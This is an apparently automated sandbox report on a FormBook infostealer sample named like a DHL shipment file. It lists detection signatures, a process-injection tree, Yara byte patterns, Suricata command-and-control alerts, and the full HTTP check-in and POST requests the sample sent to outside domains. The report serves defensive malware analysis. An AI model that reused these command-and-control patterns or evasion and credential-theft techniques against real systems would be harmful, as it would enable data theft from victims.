Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL 40312052024.exe

Overview

General Information

Sample name:DHL 40312052024.exe
Analysis ID:1570503
MD5:76d2944f234154fa8d4c251ec4c621be
SHA1:47879dc1ba25220085eddb2f8aa0b29369909bef
SHA256:c45d7adb88147a71f85263d1e1f3394cb3edb67b2659986a1c6785326d4357b0
Tags:DHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL 40312052024.exe (PID: 764 cmdline: "C:\Users\user\Desktop\DHL 40312052024.exe" MD5: 76D2944F234154FA8D4C251EC4C621BE)
    • svchost.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\DHL 40312052024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • oYzsgiLOOTqCTABCCGZlOCaAgG.exe (PID: 1852 cmdline: "C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5032 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • oYzsgiLOOTqCTABCCGZlOCaAgG.exe (PID: 4568 cmdline: "C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4676 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL 40312052024.exe", CommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", ParentImage: C:\Users\user\Desktop\DHL 40312052024.exe, ParentProcessId: 764, ParentProcessName: DHL 40312052024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", ProcessId: 6488, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DHL 40312052024.exe", CommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", ParentImage: C:\Users\user\Desktop\DHL 40312052024.exe, ParentProcessId: 764, ParentProcessName: DHL 40312052024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 40312052024.exe", ProcessId: 6488, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-07T07:00:32.905597+010020507451Malware Command and Control Activity Detected192.168.2.549738154.215.72.11080TCP
            2024-12-07T07:01:06.875724+010020507451Malware Command and Control Activity Detected192.168.2.549819116.50.37.24480TCP
            2024-12-07T07:02:30.424909+010020507451Malware Command and Control Activity Detected192.168.2.54987485.159.66.9380TCP
            2024-12-07T07:02:45.221540+010020507451Malware Command and Control Activity Detected192.168.2.54998791.195.240.9480TCP
            2024-12-07T07:03:09.133637+010020507451Malware Command and Control Activity Detected192.168.2.54999166.29.149.4680TCP
            2024-12-07T07:03:24.769279+010020507451Malware Command and Control Activity Detected192.168.2.549995195.110.124.13380TCP
            2024-12-07T07:03:56.385111+010020507451Malware Command and Control Activity Detected192.168.2.549999217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.elettrosistemista.zip/fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fBAvira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fBAvira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fBAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: DHL 40312052024.exeReversingLabs: Detection: 47%
            Source: DHL 40312052024.exeVirustotal: Detection: 41%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: DHL 40312052024.exeJoe Sandbox ML: detected
            Source: DHL 40312052024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120500383.00000000005AE000.00000002.00000001.01000000.00000004.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278282090.00000000005AE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 40312052024.exe, 00000000.00000003.2052018361.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 40312052024.exe, 00000000.00000003.2050921720.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106405513.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104672703.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2204504702.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2201825433.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 40312052024.exe, 00000000.00000003.2052018361.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 40312052024.exe, 00000000.00000003.2050921720.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2106405513.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104672703.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2204504702.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2201825433.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2170477605.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201616955.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000003.2140528861.0000000000B4B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4474120065.000000000343C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278718114.0000000002A3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2497878944.000000000C1EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4474120065.000000000343C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278718114.0000000002A3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2497878944.000000000C1EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2170477605.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201616955.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000003.2140528861.0000000000B4B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0081445A
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081C6D1 FindFirstFileW,FindClose,0_2_0081C6D1
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0081C75C
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081EF95
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081F0F2
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081F3F3
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008137EF
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00813B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00813B12
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081BCBC

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49819 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49738 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49874 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49987 -> 91.195.240.94:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008222EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008222EE
            Source: global trafficHTTP traffic detected: GET /fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?k0=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 6b 30 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: k0=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
